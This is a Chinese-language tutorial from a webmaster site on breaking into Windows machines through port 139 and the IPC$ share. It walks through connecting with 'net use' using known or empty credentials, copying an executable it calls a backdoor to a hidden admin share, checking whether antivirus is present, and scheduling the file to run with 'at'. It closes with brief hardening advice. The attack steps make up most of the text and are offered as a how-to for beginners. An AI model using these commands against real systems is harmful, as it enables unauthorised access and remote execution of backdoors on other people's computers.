站长网_站长创业_站长主页_站长之家_易采站长站

会员投稿 投稿指南 站长资讯通告: 简易入侵139端口
搜索:
您的位置: 主页 > 教程 > 电脑安全 > 侵入攻防 > » 正文

简易入侵139端口

来源: 易采站长站

提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。   

首先,连接的命令是:   

net<空格>use<空格>\\IP地址\ipc$Content$lt;空格>密码<空格>/user:用户名   

假设我要连接的目标IP地址是:192.168.1.11,用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的:   

net use \\192.168.1.11\ipc$Content$nbsp;123456 /user:google 如果连接成功,那么系统会提示"命令成功完成"!   

空密码是这样的:   

如果密码是空的,那就在原先输入密码的地方以""代替。

开始查看权限:   

查看登录后用户权限的方法很简单,只要给目标系统传个文件就可以了,如果传诵成功,那么一般都是系统管理员权限了,如果不成功可能就是来访者权限或者其他用户组的。命令的格式是这样的:   

copy<>文件绝对路径<>\\IP地址\文件目标路径   

比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下:   

copy c:\a.exe \\192.168.1.11\d$Content$nbsp;   

要注意"$"符,那是隐藏共享盘的表示符,如果对方的共享盘不是隐藏的,就不需要"$"符了。如果命令执行成功,系统同样会提示"已复制 1 个文件"   

小技巧:   

再次复制相同文件至相同路径,以检测是否存在杀毒软件!!!   

如果系统提示“改写 \\192.168.1.11\d$\a.exe 吗? (Yes/No/All):”则说明文件在还在目标系统上,没有被杀毒软件查杀(一般发送过去的都是后门程序只类的东西,只有系统安装了杀毒软件都会被杀掉)。如果没有提示,则说明安装了杀毒软件。   

查看目标系统时间,准备使用at任务计划运行程序。  

命令格式:   net<空格>time<空格>\\IP地址   

例子:   net time \\192.168.1.11   

系统会返回目标的当前时间,时间显示后,AT任务计划命令需要使用24小时制。比如系统显示“\\192.168.1.11 的当前时间是 2006/5/10 下午 06:02”在使用到AT任务计划命令时,这个“下午06:02”就需要换算成“18:02”!   

使用AT命令为目标系统添加任务计划:   

格式:   at<空格>\\IP地址<空格>指定运行时间<空格>需要运行的文件路径名   

例子:   at \\192.168.1.11 18:20 d:\a.exe   

IPC通道入侵就目前来看已经是一个非常老的攻击手段了,现在针对IPC通道的防御手段也越来越多,越来越简单。但如果一个攻击者成功获得了IPC通道的一个System权限,那对于被攻击的系统来说无意是致命的。   所以,建议用户将Server服务关闭,信使服务与Task Scheduler服务(计划任务)也都关闭,这样可以较全面的保护计算机在IPC通道方面的安全。

Tags: 139
最新图文资讯
1 2 3 4 5 6
相关文章列表:
易采站长站 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 人才招聘 - 帮助 -